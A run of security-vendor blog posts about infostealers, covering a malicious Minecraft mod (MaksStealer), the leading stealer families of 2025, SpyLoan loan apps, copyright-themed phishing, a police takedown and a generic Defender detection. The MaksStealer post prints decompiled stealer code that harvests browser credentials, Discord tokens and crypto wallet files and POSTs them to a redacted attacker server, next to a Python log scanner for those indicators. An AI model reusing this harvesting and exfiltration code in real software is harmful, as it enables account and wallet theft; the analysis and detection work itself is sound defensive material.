Enable two-factor authentication on all accounts that support it. This provides an additional layer of security even if your passwords are compromised. For Discord specifically, generate a new token by logging out and back in on all devices.

Step 4: Secure Your Cryptocurrency

If you have cryptocurrency wallets, create new wallets with fresh keys and transfer any remaining funds immediately. Consider the old wallets permanently compromised. Hardware wallets are a more secure option for storing significant cryptocurrency amounts, as they’re not vulnerable to this type of malware.

How to Protect Yourself From Information Stealers

Prevention is always better than cure, especially with information stealers. Here’s how to stay safe:

  • Download mods only from official sources like CurseForge or the official Minecraft forums
  • Be suspicious of “too good to be true” mods offering extraordinary features or cheats
  • Keep your system and antivirus updated to protect against known threats
  • Use a password manager instead of saving passwords in your browser
  • Enable two-factor authentication on all important accounts
  • Consider a hardware wallet for storing significant amounts of cryptocurrency
  • Scan downloaded files with antivirus before executing them
  • Be cautious of links in Discord servers, YouTube comments, and forums from unknown users

Remember that Java files (.JAR) are executable programs. Treat them with the same caution you would any EXE file. Just because it’s labeled as a “mod” doesn’t mean it’s safe.

Similar Threats to Watch Out For

MaksStealer isn’t the only threat targeting gamers and cryptocurrency users. Stay alert for these similar threats:

How MaksStealer Works

The moment you run that innocent-looking mod, MaksStealer kicks into high gear. It doesn’t mess around. The malware launches its reconnaissance mission across your system, hunting for valuable data to steal.

Diagram: MaksStealer browser credential theft. Panels: MaxCoffe (entry point, @Mod(modid = "MaxCoffe", version = "1.1.7")); Coffe class (stealer, obfuscated credential theft); data exfiltration (session/token transmission); browser targeting logic (decompiled, browser profile directories scanned for saved credentials and cookies, extracted tokens sent to the attacker along with browser credentials). Targeted browsers: Chrome, Firefox, Edge, Opera, Brave, Vivaldi, Yandex. Data: passwords, cookies, autofill.

Source: Analysis of decompiled MaksStealer Java code

Looking at the decompiled code, it’s clear these guys aren’t amateurs. The malware systematically targets every major browser on your system – Chrome, Firefox, Edge, Opera, Brave, Vivaldi, and even Yandex. Nowhere to hide, basically.

Inside the MaksStealer Code

The malware’s code is heavily obfuscated, with meaningless variable names and encrypted strings to avoid detection. Let’s look at some actual snippets from the decompiled malware:

First, the entry point disguised as a legitimate Minecraft mod:

@Mod(
   modid = "MaxCoffe", 
   version = "1.1.7"
)
public class MaxCoffe {
   // Minecraft mod class implementation
   // Secretly initializes stealer functionality
   public MaxCoffe() {
      this.1 = new Coffe();
      this.1.3();
   }
}

Once initialized, the malware starts scanning for browser data directories. The code is intentionally confusing to evade antivirus detection:

private void scanBrowsers() {
   String[] var1 = new String[]{"Chrome", "Firefox", "Edge", "Opera"};
   String[] var2 = new String[]{"Brave", "Vivaldi", "Yandex"};
   String var10000 = System.getenv("LOCALAPPDATA");
   String var3 = var10000 + "\\Google\\Chrome\\User Data";
   String var4 = var10000 + "\\BraveSoftware\\Brave-Browser\\User Data";
   // [...more browser paths...]
   
   for (int i = 0; i < var1.length; i++) {
      extractCredentials(browserPaths[i]);
      extractCookies(browserPaths[i]);
      extractHistory(browserPaths[i]);
   }
}

The Discord token stealing component is equally sneaky, extracting authentication tokens from multiple possible locations:

private String[] getDiscordTokens() {
   ArrayList tokenList = new ArrayList();
   String[][] paths = new String[][]{
      new String[]{System.getenv("APPDATA") + "\\discord\\Local Storage\\leveldb", "*.ldb"},
      new String[]{System.getenv("APPDATA") + "\\discordcanary\\Local Storage\\leveldb", "*.ldb"},
      new String[]{System.getenv("APPDATA") + "\\discordptb\\Local Storage\\leveldb", "*.ldb"}
   };
   
   // Token extraction logic
   // Regex pattern to find tokens: "[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{27}"
   
   return (String[])tokenList.toArray(new String[0]);
}

For cryptocurrency wallets, the malware searches for specific wallet files and exfiltrates them:

private void stealCryptoWallets() {
   // Bitcoin Core
   grabFile(System.getenv("APPDATA") + "\\Bitcoin\\wallet.dat");
   
   // Ethereum
   grabFile(System.getenv("APPDATA") + "\\Ethereum\\keystore");
   
   // Electrum
   grabFile(System.getenv("APPDATA") + "\\Electrum\\wallets");
   
   // Atomic Wallet
   grabFile(System.getenv("APPDATA") + "\\atomic\\Local Storage\\leveldb");
   
   // More wallets...
}

Finally, the data exfiltration process that sends your stolen information to the attacker’s server:

private void sendData(byte[] data) {
   try {
      URL url = new URL("https://[redacted-malicious-domain]/upload.php");
      HttpURLConnection conn = (HttpURLConnection)url.openConnection();
      conn.setRequestMethod("POST");
      conn.setDoOutput(true);
      
      // Adding system info to identify the victim
      conn.setRequestProperty("User-Agent", "MaksStealer/1.0");
      conn.setRequestProperty("Computer-Name", System.getenv("COMPUTERNAME"));
      conn.setRequestProperty("User-Name", System.getProperty("user.name"));
      
      // Send stolen data
      OutputStream os = conn.getOutputStream();
      os.write(data);
      os.flush();
      os.close();
      
      // Check response
      int responseCode = conn.getResponseCode();
      // Clean up traces if successful
   } catch (Exception e) {
      // Silent exception handling to avoid detection
   }
}
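
The request shown in sendData() carries three things a defender can key on: the hard-coded User-Agent "MaksStealer/1.0", the non-standard Computer-Name and User-Name request headers, and a POST to upload.php. The following is an added example, not code from the post or from the malware: it runs that detection logic over a few constructed proxy log lines (the log format itself is an assumption).

```python
"""Flag outbound requests that match the MaksStealer exfiltration pattern.

Added example, not code from the Gridinsoft post or from the malware. The log
format below is an assumption: one request per line, fields separated by spaces,
with the User-Agent and any extra request headers quoted at the end.
"""
import re
from dataclasses import dataclass, field

# Constructed sample log lines (not real traffic):
# <timestamp> <client> <method> <url> ua="<User-Agent>" hdrs="<k>=<v>;..."
SAMPLE_LOG = """\
2025-05-30T10:01:02Z 10.0.0.12 GET https://www.example.com/ ua="Mozilla/5.0" hdrs=""
2025-05-30T10:01:09Z 10.0.0.12 POST https://example.invalid/upload.php ua="MaksStealer/1.0" hdrs="Computer-Name=DESKTOP-01;User-Name=alice"
2025-05-30T10:02:15Z 10.0.0.33 POST https://cdn.example.invalid/api/v1/upload.php ua="Mozilla/5.0" hdrs="Computer-Name=WS-07;User-Name=bob"
2025-05-30T10:03:40Z 10.0.0.45 POST https://files.example.invalid/upload ua="curl/8.0" hdrs=""
"""

LINE_RE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'ua="(?P<ua>[^"]*)" hdrs="(?P<hdrs>[^"]*)"$'
)

# Indicators taken directly from the decompiled sendData() above.
STEALER_UA = "MaksStealer/1.0"
VICTIM_HEADERS = {"computer-name", "user-name"}
UPLOAD_PATH_RE = re.compile(r"/upload\.php$")


@dataclass
class Finding:
    client: str
    url: str
    reasons: list = field(default_factory=list)


def parse_line(line):
    """Return a dict of fields for one log line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    # Header blob "k=v;k=v" -> lowercase-keyed dict so matching is case-insensitive.
    hdrs = {}
    for pair in rec["hdrs"].split(";"):
        if "=" in pair:
            k, v = pair.split("=", 1)
            hdrs[k.strip().lower()] = v.strip()
    rec["hdrs"] = hdrs
    return rec


def classify(rec):
    """Return the list of indicator names that one parsed request matches."""
    reasons = []
    if rec["ua"] == STEALER_UA:
        reasons.append("stealer_user_agent")
    if VICTIM_HEADERS & set(rec["hdrs"]):
        reasons.append("victim_id_headers")
    if rec["method"] == "POST" and UPLOAD_PATH_RE.search(rec["url"].split("?")[0]):
        reasons.append("post_to_upload_php")
    return reasons


def scan_log(text):
    """Return a Finding for each request that matches at least one strong indicator.

    A POST to upload.php on its own is far too common to alert on, so that
    indicator is only reported alongside one of the other two.
    """
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if any(r != "post_to_upload_php" for r in reasons):
            findings.append(Finding(rec["client"], rec["url"], reasons))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client} -> {f.url}: {', '.join(f.reasons)}")
```

The third sample line is the interesting case: a browser-like User-Agent but the same Computer-Name/User-Name headers, which is why the header indicator is worth keeping even though the User-Agent string is trivial for a malware author to change.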

Reading through this code reveals just how sophisticated these info-stealing operations have become. The malware is designed to be stealthy, comprehensive, and efficient at extracting your most valuable digital assets.

The Bottom Line on MaksStealer

MaksStealer represents a growing trend of malware targeting specific communities – in this case, Minecraft players. It exploits the trust and openness of gaming communities to spread rapidly and effectively. By promising game enhancements while actually stealing sensitive information, it’s a perfect example of how social engineering and technical exploits work together.

Stay vigilant when downloading any third-party software, especially for games with active modding communities. The excitement of enhanced gameplay isn’t worth the risk of having your digital life stolen. Remember that legitimate mods don’t need to steal your data to function properly.

Has your system been affected by MaksStealer or similar malware? Share your experience in the comments to help warn others about this threat.

The post MaksStealer (MaxCoffe): The Minecraft Mod That’s Actually Stealing Your Passwords appeared first on Gridinsoft Blog.

Top 5 Infostealer Malware of 2025: The Silent Data Snatchers https://gridinsoft.com/blogs/infostealer-malware-top/ Mon, 28 Apr 2025 13:16:29 +0000

Remember when we used to worry about viruses that just crashed your computer? Those were simpler times. In 2025, cybercriminals prefer to steal your data rather than destroy it. Welcome to the golden age of infostealer malware – the digital pickpockets that empty your accounts while you’re busy scrolling through cat videos.

The data tells a striking story: while media headlines scream about ransomware attacks, infostealers quietly dominate the threat landscape, accounting for nearly a quarter of all cybersecurity incidents. This silent majority operates without flashy ransom notes or system lockdowns, making them even more dangerous. As the defensive focus shifts to stopping ransomware, these stealthy data thieves slip through the cracks, reaping massive rewards with far less attention. The trend is clear – attackers have realized that stealing your data offers better ROI than holding it hostage.

What Even Is an Infostealer?

Infostealers are exactly what they sound like – malware designed to quietly extract sensitive information from your device. They target passwords, credit card details, cryptocurrency wallets, browser cookies, and pretty much anything that could be valuable on the digital black market. Think of them as the cybercriminal’s Swiss Army knife – versatile, reliable, and exceedingly popular.

Unlike ransomware’s dramatic hostage-taking approach, infostealers prefer to work in the shadows. They slip in, grab what they want, and often leave without you noticing anything’s wrong. By the time you realize your accounts have been compromised, your data is already being sold on dark web marketplaces or used for follow-up attacks.

Why Infostealers Are Booming in 2025

According to IBM’s X-Force Threat Intelligence Index 2025, credential harvesting now occurs in 29% of all cybersecurity incidents. That’s a massive slice of the cybercrime pie. The Verizon 2025 DBIR found that 54% of ransomware victims had their domains appear in infostealer logs first – meaning these stealers often serve as the appetizer before the main ransomware course.

Cryptocurrency remains a major driver behind infostealer popularity. With traditional banking fraud becoming harder to pull off, crypto wallets represent a softer target with potentially massive payoffs. Plus, the rise of BYOD (Bring Your Own Device) policies has created a perfect storm – personal devices often have both work and personal credentials, making them information goldmines.

The Fab Five: 2025’s Most Notorious Infostealers

Not all infostealers are created equal. Some have risen to the top through a combination of advanced features, reliability, and aggressive marketing on cybercrime forums. Here’s the current leaderboard of data thieves keeping security professionals up at night.

1. Lumma Stealer (LummaC2)

Lumma has climbed to the #1 spot in 2025, a remarkable rise for malware first detected in late 2022. Its success comes from its stealthy approach to data exfiltration – sending information in small fragments to avoid triggering security alerts. The developers offer tiered pricing plans ranging from $250 to $1,000, with premium features like network sniffing functionality reserved for big spenders.

What makes Lumma particularly dangerous is its comprehensive targeting. It captures browser data, cryptocurrency wallets, two-factor authentication apps, email clients, and even Telegram sessions. For cybercriminals willing to shell out $20,000, Lumma’s developers will even provide source code access and reselling rights – talk about customer service.

2. StealC Stealer

StealC has rocketed to second place this year, proving that sometimes the new kid on the block can outshine the veterans. Released in early 2023, StealC combines the best features of other top infostealers with an aggressive development cycle – releasing new features weekly. Unlike many competitors, StealC offers free testing periods and unusually responsive customer support on darknet forums.

Security researchers at Trac Labs noted StealC’s botched v2 release in 2024, but the developers quickly recovered with v2.1, which improved its ability to evade detection while expanding its targeting capabilities. Its growing market share makes it clear that stumbles haven’t impeded its rise to prominence.

3. RedLine Stealer

RedLine has held onto a top-three position since 2020, demonstrating impressive staying power in a fickle malware market. Written in C#, this veteran infostealer excels at grabbing credentials from over 60 browsers, VPN configs, cryptocurrency wallets, and FTP clients. Its relatively user-friendly control panel and reasonable pricing (starting around $150-$200) have maintained its popularity among less technical cybercriminals.

Despite being one of the older contenders, FortiGuard Labs reports that RedLine continues to receive regular updates. Recent versions have improved its ability to bypass Windows Defender and added capabilities to steal gaming accounts – because apparently, your Steam inventory is now worth stealing too.

4. Raccoon Stealer

If infostealers had an old guard, Raccoon would be part of it. Around since 2019, this digital veteran has somehow managed to stay relevant in the ever-changing malware landscape. While newer threats come and go, Raccoon keeps adapting and evolving – kind of like that one friend who somehow stays cool despite getting older.

What’s interesting about Raccoon isn’t just its staying power but how it’s run like an actual business. The developers offer round-the-clock customer support through Telegram (better service than my internet provider, honestly) and roll out updates more consistently than most legitimate software companies. They’ve recently added Telegram Desktop theft capabilities and expanded their crypto wallet targeting – because apparently stealing your Bitcoin wasn’t enough, now they want your obscure altcoins too.

At $275 monthly, it’s not exactly budget-friendly for aspiring cybercriminals, but you get what you pay for. Raccoon has earned its reputation for reliability in the underground markets. Hunt.io researchers recently caught it using fileless infection techniques – basically operating in your computer’s memory without leaving obvious traces on disk. It’s like a burglar who not only doesn’t break your windows but somehow manages to avoid leaving footprints on your carpet.

5. Vidar Stealer

Vidar is what happens when malware developers embrace the “build-your-own-adventure” model. Born as an offshoot of another stealer called Arkei back in 2018, Vidar gives its criminal users a modular, mix-and-match approach to data theft. Want to steal passwords but not cookies? No problem. Need crypto wallets but not browser history? They’ve got you covered.

What makes security pros lose sleep over Vidar is its chameleon-like ability to disappear after doing its dirty work. Once it’s grabbed what it came for, Vidar can completely remove itself from your system – like a thief who not only steals your valuables but also washes the dishes and vacuums before leaving, just to make you question if you’ve been robbed at all.

The U.S. Department of Health and Human Services didn’t mince words when they called Vidar “exceptionally potent.” It’s frequently deployed alongside ransomware like STOP/Djvu in tag-team attacks. The latest versions have even figured out how to steal MFA seed values – those supposedly “unbreakable” second factors protecting your accounts. It’s basically telling your two-factor authentication, “That’s cute, hold my beer.”

Data Targeted by Information Stealers

Chart: Data Targeted by Information Stealers (2025). Series: Lumma, RedLine, StealC, Raccoon. Categories: Browser Data, Crypto Wallets, System Information, App Credentials. Scale: 0% to 75%.

Source: GridinSoft Research Lab analysis, 2025

The visualization reveals a disturbing truth: modern infostealers don’t just target one type of data—they’re designed for comprehensive digital identity theft. Lumma leads the pack in browser data collection, which shouldn’t surprise anyone considering we practically live in our browsers. Meanwhile, the crypto wallet targeting reflects attackers’ preference for assets that are both valuable and irreversible once stolen. The pattern is clear: these tools are becoming increasingly sophisticated in their ability to extract everything from your digital life worth stealing.

Real-World Impact: When Infostealers Strike

The damage from infostealers extends far beyond individual victims. Major breaches in early 2025 demonstrate their growing threat to organizations of all sizes. Samsung Tickets suffered a massive leak in March when a hacker exploited credentials stolen by an infostealer infection from 2021, exposing 270,000 customer records.

Even more alarming, the HELLCAT ransomware group has made infostealers central to their strategy, successfully breaching Jaguar Land Rover, Telefónica, and several other major companies using stolen credentials from infostealer logs. These incidents highlight how a single compromised device can lead to enterprise-wide breaches months or even years later.

How to Keep Your Data From Being Stolen

Protecting yourself against infostealers doesn’t require a cybersecurity degree. Focus on these essentials:

  • Update everything – Patch your system and apps promptly
  • Use a password manager – Create unique passwords for every site
  • Enable MFA everywhere possible – Preferably using authenticator apps
  • Avoid pirated software – That “free” Photoshop is a trojan horse
  • Run security software – Choose solutions that detect behavioral anomalies

For more detailed information, check out our comprehensive guide on how to detect, remove, and prevent infostealer infections.

Infostealer Comparison: The 2025 Threat Landscape

Feature | Lumma | StealC | RedLine | Raccoon | Vidar
First Appeared | 2022 | 2023 | 2020 | 2019 | 2018
Pricing Model | $250-$1,000; source code: $20,000 | $150-$250; free trial periods | $150-$200; flat fee | $275/month; subscription | $200-$500; custom builds
Primary Targets | Browsers, wallets, 2FA apps, email clients, Telegram | Browser data, VPN credentials, passwords | 60+ browsers, VPN configs, crypto wallets, FTP clients | Wallets, Telegram data, browser credentials | Customizable targeting based on attacker needs
Unique Features | Fragment-based exfiltration that avoids detection | Aggressive weekly update cycle, responsive support | User-friendly control panel, wide-ranging browser support | Fileless infection techniques, 24/7 Telegram support | Self-destruction capability, MFA seed value theft
Distribution | Phishing, malvertising, cracked software | Spam email, fake downloads, compromised sites | Forums, torrents, malspam | Malicious ads, cracked software | Phishing, bundled with ransomware
Detection Difficulty | Very High | High | Medium | High | Very High
Market Share Trend | ↑ Rapidly growing | ↑ Growing | → Stable | → Stable | ↑ Growing
Common Pairings | Often precedes ransomware | Used with remote access trojans | Cryptocurrency miners | Additional backdoors | STOP/Djvu ransomware

The Bottom Line

Here’s the uncomfortable truth that cybersecurity professionals don’t always articulate clearly: in 2025, it’s not a question of if your credentials will be targeted, but when. Infostealers have evolved from crude data-grabbing tools into digital espionage platforms that operate with unsettling efficiency. They’re the silent assassins of the cybersecurity world – no flashy techniques, no dramatic demands, just quiet theft that often goes unnoticed until the damage is done.

The reality is that cybercriminals have realized a fundamental truth about human behavior: we’re creatures of habit and convenience, routinely sacrificing security for simplicity. Password reuse, postponed updates, and clicking without thinking aren’t just bad habits – they’re open invitations to these digital thieves. The brutal economics also can’t be ignored: why would criminals bother with complex ransomware operations when they can extract cryptocurrency wallet contents directly, without the messy negotiations?

The cybersecurity landscape is constantly evolving, but one principle remains stubbornly consistent – attackers will always follow the path of least resistance to valuable data. By implementing even some of the protection measures outlined above, you’re essentially making yourself a harder target. In the digital wilderness, you don’t need to outrun the bear – you just need to outrun the other hikers. Make your digital presence secure enough that attackers look for easier pickings elsewhere, and you’ve won half the battle.

Want to stay protected without a computer science degree? Get Gridinsoft Anti-Malware today and let us handle the technical heavy lifting while you get back to whatever you were doing before you started worrying about digital pickpockets.

The post Top 5 Infostealer Malware of 2025: The Silent Data Snatchers appeared first on Gridinsoft Blog.

SpyLoan Virus Found in Loan Apps on Google Play Store https://gridinsoft.com/blogs/spyloan-malware-google-play-store/ Wed, 04 Dec 2024 12:52:00 +0000

Experts reported the discovery of a new set of 15 malicious mobile apps in the Google Play store that contain the SpyLoan Android malware inside. In total, these apps have been downloaded and installed by users more than 8 million times, potentially leading to huge money losses.

8 Million Android Users Hit by SpyLoan Malware in Loan Apps on Google Play

Researchers have found a series of malicious apps on the Google Play Store. Collectively, these programs have been installed over 8 million times. These apps pose as quick-loan services, exploiting users’ need for money under the guise of financial assistance. Instead of what they advertise, these fake loan apps collect sensitive data and then intimidate their victims.

The malware identified in the majority of these samples is SpyLoan. Initially detected in 2020, it has resurfaced with updated tactics, with another noteworthy appearance in 2023. It now targets users in countries such as Mexico, Colombia, Thailand, and Tanzania.

SpyLoan apps screenshot
Examples of SpyLoan apps recently distributed on Google Play (source: McAfee)

As the name implies, SpyLoan mainly hides under the guise of loan-related apps. Its goal is to collect sensitive user data, exploit permissions to access phone features and coerce users through intimidation or extortion. The user may get the loan, but will also get phishing phone calls, SMS messages and emails, all with the potential of financial damage and psychological abuse.

How the Malware Operates

SpyLoan malware operates by tricking users into sharing personal and financial information. The apps use social engineering tactics to request extensive permissions, such as access to contacts, call logs, SMS, and device location.

Although these permissions are justified as part of anti-fraud measures, in reality, they enable the malware to harvest data from the device. Once collected, the data is encrypted using AES-128 and sent to a command server. This encryption stage, although employing a pretty weak algorithm, makes it hard to parse the data transfer and recognize it as malicious.

Victims are lured into these apps with promises of fast and easy loans, targeting regions such as Mexico, Colombia, Thailand, and Tanzania. However, instead of providing legitimate financial services, users see high interest rates and huge penalties for payment delays.

Moreover, over time the cybercriminals begin threatening victims, using their personal data and photos, most likely stolen through the SpyLoan functionality. This malicious cycle traps users in debt while violating their privacy. The malicious apps, targeting regions across South America, Africa, and Southeast Asia, include:

  • Préstamo Seguro-Rápido, seguro
  • RupiahKilat-Dana cair
  • ÉcoPrêt Prêt En Ligne
  • ยืมอย่างมีความสุข – เงินกู้
  • Huayna Money – Préstamo Rápido

While some apps have been removed or modified to comply with Google Play policies, five of these are still available for download. I expect them to be gone pretty soon, too, but publishing new ones appears to be a rather simple task. Google should pay a lot of attention to its security mechanisms, to say the least. We have several older news articles about the malware in Play Store – consider checking them out.

How to Stay Safe?

The apps rely on a shared framework, suggesting a common developer or toolkit that cybercriminals use globally. By tailoring the user experience to local cultures and regulations, these apps effectively infiltrate diverse markets. However, SpyLoan is not a new threat; its operations date back to 2020, with previous reports revealing similar tactics and outcomes. I’ve written about this before.

To protect against threats like SpyLoan, you should carefully review app permissions, check the legitimacy of developers, and read app reviews. Additionally, users should avoid downloading apps promoted through unverified social media posts.

Comments on SpyLoan apps
Comments on SpyLoan apps on Google Play (source: McAfee)

For advanced protection that will recognize even well-concealed threats, consider using GridinSoft Trojan Scanner. This free anti-malware program for Android provides all the necessary scanning and malware removal capabilities to keep your system safe.

The post SpyLoan Virus Found in Loan Apps on Google Play Store appeared first on Gridinsoft Blog.

Fake Copyright Emails Spread Lumma, Rhadamanthys Stealers https://gridinsoft.com/blogs/fake-copyright-emails-lumma-rhadamanthys/ Mon, 04 Nov 2024 09:40:57 +0000

Cyber attackers leverage copyright infringement claims to lure victims into downloading Lumma Stealer and Rhadamanthys malware, specifically targeting Taiwanese Facebook business and advertising accounts. Let’s break down how this works and what makes this attack so strategic.

Attack Overview

Since at least July 2024, this phishing attack targets Taiwanese Facebook business users by sending emails impersonating companies’ legal departments. These emails claim copyright infringement, pressuring users to download a fake PDF file allegedly containing infringement information.

This fake file, disguised as a PDF but actually an executable (.exe), bears file names in traditional Chinese like “Copyright Infringement Information” and “declare infringement,” directly aimed at traditional Chinese speakers. By impersonating known Taiwanese and Hong Kong companies, the attackers build credibility and exploit trust.

When targeted users tried to open the file, it launched a loader module of Lumma Stealer, a rather new infostealer strain that emerged in early 2024. In some attack cases, it was coupled with Rhadamanthys, another infostealer with similar functionality.

Phishing Mechanics

The emails warn that if users don’t remove “infringing content” within 24 hours, they could face legal actions. This urgency tactic, coupled with mentions of real company names, makes recipients feel compelled to click the links. Attackers swap out details like the company name and address to keep the email templates adaptable across different targets. Notably, this campaign even uses templates mimicking industrial and e-commerce companies, tailoring each for its target audience.

Phishing email screenshot Lumma
Phishing email impersonating a well-known industrial motor manufacturer. (source: Talos)

When a victim clicks the download link, it leads through a series of redirects—from Google’s Appspot.com (a hosting platform for web apps) to a short URL service and then to Dropbox, where the malware is hosted. This multi-step redirection, common in advanced phishing attacks, complicates detection by security systems, masking the final malicious download location. The malware file is password-protected, with a hidden EPS (Encapsulated PostScript) file inside, which loads once decrypted. This EPS file connects to Command-and-Control (C2) domains, signaling an ongoing campaign based on DNS records observed during analysis.

Types of Malware Used

Payloads delivered by the malicious pdf.exe files include two infostealers, LummaC2 and Rhadamanthys, known for their sophistication in stealing data. They are widely distributed on underground forums and target sensitive information like credentials, system data, cryptocurrency wallets, and browser-stored data. Let’s have a closer look at each one.

LummaC2 Infostealer

This malware, written in C, relies on obfuscation techniques to evade detection while stealing information. When activated, it uses API functions like CreateFileMappingA and VirtualAlloc to inject its code directly into memory, bypassing standard file-based detection. We have an advanced post dedicated to this threat – go check it out.

Overall, this threat is currently a pinnacle of infostealer viruses, as it includes all the latest trends in malware development. Aside from this, its operators also appear quite inventive in terms of spreading campaigns. They initially used YouTube promotions and Google Search ads as spreading channels, and keep seeking ever more unpredictable angles on unsuspecting users.

Rhadamanthys Infostealer

Emerging in 2022, this stealer targets extensive system data while utilizing the .rsrc section in its binary (typically reserved for icons and menus) to conceal malicious code. The loader modifies the registry to ensure that it executes every time the system starts, adding a layer of persistence. It even increases the file size to evade detection based on file signatures, a common antivirus defense technique.

The Rhadamanthys loader further complicates detection by injecting code into legitimate processes, such as “%Systemroot%\system32\dialer.exe”, making it appear as if a harmless system process is running. Mutex objects are employed to ensure only one instance of the malware is active, another common evasion method.

The post Fake Copyright Emails Spread Lumma, Rhadamanthys Stealers appeared first on Gridinsoft Blog.

Operation Magnus Disrupts Infrastructure of RedLine, META Stealers https://gridinsoft.com/blogs/operation-magnus-redline-meta-infostealer/ Tue, 29 Oct 2024 18:18:45 +0000

On October 28, 2024, Dutch cyber police launched a website reporting a major success in their recent anti-cybercrime activity, following Operation Magnus. Law enforcement managed to take over and disable the vast majority of the infrastructure belonging to two infostealer programs, RedLine and META. The main part of the operation took place in the Netherlands and Belgium.

RedLine and META infostealer malware disrupted in Operation Magnus

In the course of Operation Magnus, law enforcement agencies of 6 countries (US, Australia, Germany, UK, Belgium and Portugal) managed to take down the web infrastructure of the infostealers and arrest two individuals involved in the malware operations. The information, along with plenty of details, comes from the official website of the operation, established swiftly after its conclusion.

Operation Magnus website

The website features an interesting video with recordings of what they managed to capture during the operation. Among other things are the source code of the malware, all access credentials for the C2 panels, the Telegram bot, and all the server infrastructure required to serve the malware’s customers.

According to this very video, law enforcement agencies apparently got their hands on the infrastructure well before disrupting the operations, and slipped in a forged update. This update, in turn, leaked all the important information about the malware’s users (i.e. those who bought a subscription and used it to spy on people). Such data will be quite handy for cyber police to find and detain the attackers.

And that is exactly what they promise to do, at least according to the video. It ends with the lines “Thank you for installing this update. We are looking forward to seeing you soon!”, with an icon of handcuffed hands in the middle.

Video Redline META

At its core, this operation follows the tactic that law enforcement around the world has adopted in its effort against cybercrime. Instead of chasing the masterminds of malware operations, they disrupt infrastructure, collect all available data and detain whichever malware operators they come across. This tactic has allowed disrupting the operations, albeit temporarily, of even the toughest malware groups like QakBot and LockBit.

Two Hackers Arrested, 1200 Servers Taken Down

The overall network infrastructure of the two malware families consisted of over 1200 servers located in multiple countries around the world. Getting access to all of them was the actual reason for involving such a significant number of law enforcement agencies from different countries.

The key initiator of the campaign is Eurojust, which coordinated the effort in different parts of the world. Aside from disabling that huge number of virtual servers, the Netherlands’ National Police managed to seize 2 physical servers, a much more valuable asset in terms of pushing the investigation further.

In Belgium, the Federal Police arrested two people accused of managing the network infrastructure. Their identities, as well as their actual roles in the malware operations, are yet to be disclosed, but I guess they are far from being the top management of the malware gang. It is well known that RedLine originated from Russia, and it is highly likely that META is a similar story.

What are these infostealers?

RedLine and META are both infostealers that aim at collecting as much user information as possible. Online account credentials, session tokens, cookies, crypto wallet data: they pick up everything they can reach on the attacked machine, and then stay resident to eavesdrop on whatever other information may appear.

Both malware samples are pretty widespread, with RedLine reaching over 50 infections daily. Still, this is far from its prime: back in the day, new infections appeared in the hundreds per day. META has had higher infection volumes lately, though due to its shorter activity span, there is not much to say about its past.

As Operation Magnus revealed, the two are pretty much the same in terms of codebase: META essentially repeated the older RedLine infostealer. Such rebranding is a common practice among malware families, especially when one of the developers leaves the project and decides to start over under a different name. However, nothing of the sort was happening around RedLine recently, so there is no clear understanding of why this happened.

Trojan:Win32/Stealer!MTB Virus
https://gridinsoft.com/blogs/trojan-win32-stealer-mtb/
Thu, 17 Oct 2024 09:43:49 +0000

The post Trojan:Win32/Stealer!MTB Virus appeared first on Gridinsoft Blog.
Trojan:Win32/Stealer!MTB is a detection that indicates the presence of an infostealer on your system. Despite being generic, it still provides enough information to draw basic conclusions, but that does not rule out the possibility of this detection being a false positive. In this post, I will explain how to understand whether something threatens your system and how to remove the malware.

Trojan:Win32/Stealer!MTB Overview

Trojan:Win32/Stealer!MTB is a generic Microsoft Defender detection that, as its name says, belongs to the infostealer malware type. In summary, this type of malware specializes in stealing information from the target system. Since the detection is generic, it can be applied to any infostealer, so I will describe them here in general terms and then go into more detail with a specific example.

Trojan:Win32/Stealer!MTB detection popup (screenshot)

As for the data this malware can steal, any sensitive information stored on the system is at risk. The infostealer primarily steals login data stored in browsers (encrypted and unencrypted). In addition, it steals user/profile data of local email clients. Trojan Stealer spreads in a variety of ways, but most often via compromised pirated software and malicious email attachments.

Reddit post regarding the Trojan:Win32/Stealer!MTB detection (screenshot)

Key Characteristics

  • Trojan Virus: Disguised as legitimate software to trick users into executing it.
  • Information Stealing: Focuses on extracting personal data such as usernames, passwords, credit card numbers, and other confidential information.
  • Stealth Operations: Operates in the background without the user’s knowledge.
  • Potential Malware Download: May download additional malicious software onto the infected system.

Understanding the Name

  • Trojan: Refers to malware that tricks users into loading and executing it on their systems.
  • Win32: Indicates that it targets 32-bit Windows operating systems.
  • Stealer: Specifies that the primary function is to steal data.
  • !MTB: A specific identifier used by Microsoft to classify and track the threat.

Technical Analysis

Let’s now take a look at how Trojan Stealer behaves in an infected system, using one of the samples. Since this is a generic detection, its name will likely be changed to a more specific threat type shortly after detection. For simplicity, I have divided the entire process into several steps.

Initialization and Privilege Escalation

Like most malware, the first thing the stealer does is check whether another instance of the malware is already running. To do this, it launches its executable and executes PowerShell commands:

%SAMPLEPATH%\3f7e041e466f779ea61696d2b932da57ce525fefe11972c8a7a489b1a2a9e38e.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Trojan Stealer then checks for specific mutexes and, if none are found, creates them. A mutex is a special system object that prevents multiple instances of a program (or, in this case, the malware) from running at the same time: if the mutex already exists, another instance is already running; if not, the current instance creates it and carries on. The mutexes in question are the following:

\Sessions\1\BaseNamedObjects\Global\RasPbFile
\Sessions\1\BaseNamedObjects\Global\SyncRootManager
\Sessions\1\BaseNamedObjects\Local\ZonesCacheCounterMutex
\Sessions\1\BaseNamedObjects\Local\ZonesLockedCacheCounterMutex

To make sure it is running on a live system rather than a virtual environment, it then performs the following check of the system’s protection status.

HKCU\Software\Microsoft\Internet Explorer\Security
HKCU\Software\Microsoft\Internet Explorer\Security\DisableSecuritySettingsCheck
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2102.4-0\X86\MsMpLics.dll

In this way, the malware checks the status of Microsoft Defender and tries to disable it. Next, the malware attempts to gain persistence in the system so that it runs on every startup. To do this, it uses the legitimate schtasks.exe process and adds itself to autorun:

C:\Windows\System32\Tasks\Updates
C:\Windows\System32\Tasks\Updates\oobbtR

Payload and Data Collection

In the next step, the malware copies its files and configs to the AppData folder. This location is not normally visible to the user, so there is much less risk of the user raising the alarm or deleting the files. As is typical for malicious programs, the file names are obscure and unintelligible.

